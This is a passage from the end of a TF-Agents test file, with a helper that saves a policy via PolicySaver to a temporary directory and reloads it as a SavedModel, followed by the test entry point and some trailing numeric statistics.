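# exercise. `policy` stands in for any TF-Agents policy and the export
# directory is arbitrary.
def save_and_reload_policy(policy, export_dir='/tmp/saved_policy'):
    saver = policy_saver.PolicySaver(policy, batch_size=None)
    saver.save(export_dir)
    # The reloaded SavedModel exposes action() and get_initial_state(), which
    # is exactly what the tests above assert against the original policy.
    return tf.compat.v2.saved_model.load(export_dir)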
if __name__ == '__main__':
tf.test.main()
| 38.874172 | 80 | 0.676263 |